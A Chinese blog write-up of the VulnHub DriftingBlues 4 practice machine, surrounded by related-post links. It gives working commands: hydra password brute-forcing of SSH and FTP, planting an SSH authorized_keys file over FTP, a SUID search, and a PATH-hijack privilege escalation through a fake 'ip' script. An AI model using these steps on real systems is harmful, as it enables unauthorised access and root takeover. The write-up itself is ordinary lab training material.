Vulnhub靶机:driftingblues 4

最新推荐文章于 2024-10-02 15:25:16 发布
最新推荐文章于 2024-10-02 15:25:16 发布
阅读量486 收藏 7
点赞数 7
分类专栏: 靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/135588850
版权

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:driftingblues4(10.0.2.20)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-4,661/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.20

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:21、22、80

在这里插入图片描述

打开网站没有可利用的功能点,并且使用dirsearch爆破目录也没爆破出来,查看源码,发现使用base64算法加密的隐藏数据

在这里插入图片描述

最终经过解码得到:/imfuckingmad.txt

访问该路径,得到一串使用Brainfuck加密的数据

在这里插入图片描述

解密得到:man we are a tech company and still getting hacked??? what the shit??? enough is enough!!! ###### /iTiS3Cr3TbiTCh.png

访问/iTiS3Cr3TbiTCh.png,发现图片是一个二维码,使用QR_Research工具识别得到一个网站,但无法访问,需要科学上网

在这里插入图片描述

在这里插入图片描述

得到一些用户名,将这些用户名构造字典,尝试使用hydra工具对ssh和ftp进行暴力破解

luther
gary
Hubert
clark

三、漏洞利用

#爆破ssh
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 10.0.2.20 ssh
#爆破ftp
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 10.0.2.20 ftp -t 64

爆破ssh失败提示不支持密码验证

在这里插入图片描述

爆破ftp成功得到用户名密码:luther/mypics

在这里插入图片描述

登录ftp,查看有什么可以利用的文件,发现sync_log文件和hubert文件夹

在这里插入图片描述

下载sync_log查看,是一个日志文件无法利用;而hubert文件夹是一个空文件夹

在这里插入图片描述

额,暂时没有思路了,瞄了一眼大佬的wp

hubert的uid与其他不一样是1001,这可能是一个用户文件夹,正好之前的用户字典里有一个Hubert,可以尝试上传ssh公钥获取shell

在本地创建ssh公钥和私钥对,将公钥文件另存为 authorized_keys

cat id_rsa.pub > authorized_keys

在这里插入图片描述

authorized_keys文件上传到/hubert/.ssh目录下,使用创建的私钥登录ssh

靶机执行
cd hubert
mkdir .ssh
cd .ssh
put authorized_keys

攻击机执行
chmod 600 id_rsa
ssh -i id_rsa hubert@10.0.2.20

在这里插入图片描述

四、提权

使用sudo -l命令查看有什么特权命令,发现没有

使用find / -perm -u=s -type f 2>/dev/null命令查看有什么可利用的具有root权限的文件,发现可疑文件/usr/bin/getinfo

在这里插入图片描述

执行该文件,发现该文件调用了命令ip,可以通过替换ip命令进行提权

在这里插入图片描述

替换ip命令,再执行/usr/bin/getinfo获取root权限

cd /tmp
echo '/bin/bash' > ip
chmod +x ip
export PATH=/tmp:$PATH

在这里插入图片描述

获取flag

在这里插入图片描述
在这里插入图片描述

参考链接:靶机渗透练习04-driftingblues4_driftingblues: 4-CSDN博客

huang0c
关注
专栏目录
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-4
Aluxian_的博客
06-17 1009
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-4,661/ 下载好了把安装包解压 然后试用VMware即可。前言:这里又是DriftingBlues-2的问题 需要自己配网卡具体参考:h
vulnhub靶场driftingblues-4
qq_58091216的博客
03-31 402
是 sync(linux同步命令,含义为迫使缓冲块数据立即写盘并更新超级块),那我尝试往 ftp 中的 hubert 文件中写入 ssh 密钥,猜测应该就会同步到 hubert 用户的家目录中,现在 ftp 中的 hubert 目录下创建 .ssh 目录。我们查看页面,没有发现任何有用的信息,我们进行查看源代码,发现一串base64编码,我们一会进行解密查看。什么也没有,目前我们掌握的信息,只有一串base64编码,我们进行解密查看。发现是Brainfuck编码,我们进行解密,发现是一个二维码。
靶机渗透练习04-driftingblues4
hirak0的博客
04-14 736
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-4,661/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
[Vulnhub靶机] DriftingBlues: 5
haosha。的博客
02-13 2016
[Vulnhub靶机] DriftingBlues: 5靶机渗透思路及方法(个人分享)
[Vulnhub靶机] DriftingBlues: 1
haosha。的博客
02-02 2069
[Vulnhub靶机] DriftingBlues: 1靶机渗透思路及方法(个人分享)
[Vulnhub靶机] DriftingBlues: 7
haosha。的博客
02-16 1531
[Vulnhub靶机] DriftingBlues: 7靶机渗透思路及方法(个人分享)
vulnhub靶机DriftingBlues: 2渗透笔记
liver100day的博客
07-26 931
文章目录环境准备1. 信息收集1.1 主机发现1.2 端口扫描1.3 访问80端口(http服务)2.漏洞利用2.1 ftp匿名登录漏洞2.2 爆破目录 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 1. 信息收集 1.1 主机发现 使用arp-scan -l获取目标靶机IP地址 arp-scan -l 扫描局域网所有设备
vulnhub靶机 | DriftingBlues:7 write-up
xj28555的博客
05-04 8296
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 题目的目标是要夺到里面的flag,搭建好环境如图。 首先用nmap扫描一下ip地址 nmap-sP192.168.110.1/24#扫描网段中存活主机 nmap-p-192.168.110.167 #在看看上面运行的服务 nmap-sV192.168.110.167#查看服务版本 上面运行的一些apache、...
vulnhub靶机 | DriftingBlues:6 write-up
xj28555的博客
05-06 800
nmap -sP 192.168.110.1/24 #首先扫描存活网段 扫描出靶机地址是192.168.110.169。在对其详细服务进行扫描。 nmap -sV 192.168.110.169 开着一个80端口,进行访问。 发现只有一张图片,那我们只好开始CTF的套路了,扫描目录。 python3 dirsearch.py -u http://192.168.110.169/ #用dirsearch扫描目录 扫到robots.txt文件,进行访问一下。 有...
vulnhub--driftingblues:2
venu_s的博客
06-03 427
靶机介绍 difficult:easy goal:get flags download:https://download.vulnhub.com/driftingblues/driftingblues2.ova 信息探测 主机发现 端口扫描 目标主机开放了21端口,有一张图片,可以匿名登陆;此外还开放了22端口和80端口 访问ftp,下载图片,图片不知道有啥用,先放着 80端口目录扫描 可以看出目标主机使用了WordPress,访问80端口 查看源码,就是一张图片 访问/blog,发现是一些博客
vulnhub--DriftingBlues:6复现超详细过程
m0_54024658的博客
06-05 407
下载靶机并且导入VMware masscan扫描存活主机,发现目标靶机192.168.152.225,并且开启了80端口 masscan -p80 192.168.152.0/24 --rate=2000 访问靶机的80端口,查看原代码,没有什么发现,想办法找页面的文件目录 ==Nmap -p- -sC -sV 192.168.152.225 --min-rate=2000 -vv == 详细扫描IP,发现了一个文件robots.txt,访问一下。 访问robots.txt文件发现一个目录,和提示目录
VulnHubDRIFTINGBLUES: 7
weixin_42075643的博客
04-28 817
Vulnhub是一个很好的靶机平台,想看官网点这里。 今天学习DRIFTINGBLUES: 7,点击这里下载哦~ 推荐使用virtualBox,我这里是VMware,看自己条件使用 难度:简单 基础练习,大佬可以绕过 接下来导入虚拟机,这里选择NAT模式,成功后,如图: 这里使用kali作为攻击机,首先查看kali的ip: 使用nmap来探测靶机ip: nmap -sS 192.198.81.0/24 可以看到有80端口,先去浏览器找找线索: 是一个network登录界面,试试若口令,爆破啥的
vulnhub--driftingblues:4
venu_s的博客
06-17 457
靶机介绍 difficult:easy goal:get flags download:https://www.vulnhub.com/entry/driftingblues-4,661/ 信息探测 主机发现 端口扫描 目录扫描 访问80端口 查看源代码,有一段base64加密的内容 base64解密,需要多次解密,发现/imfuckingmad.txt 访问/imfuckingmad.txt,是一段brainfuck加密的内容 解密发现一张图片 查看图片,是一张二维码 扫码,有一
端口隔离配置的实验
zhgjx_ywz的博客
09-28 734
LSW1-GigabitEthernet0/0/4]am isolate GigabitEthernet 0/0/5 // g0/0/4的报文不能发给g0/0/5,g0/0/5的报文可以发给g0/0/4。综上所述,端口隔离配置是一种有效的网络安全措施,可以在不增加VLAN资源消耗的情况下实现端口间的隔离和控制。在VLAN20中,PC4主机存在安全隐患,往其他主机发送大量的广播报文,通过配置接口间的单向隔离来实现其他主机对该主机报文的隔离。3、配置PC1、PC2、PC3、PC4、PC5。
【网络安全】Cookie与ID未强绑定导致账户接管
最新发布
等风来
10-02 187
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1137
在当今数字化时代,网络安全已经成为每个人都应该关注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至关重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值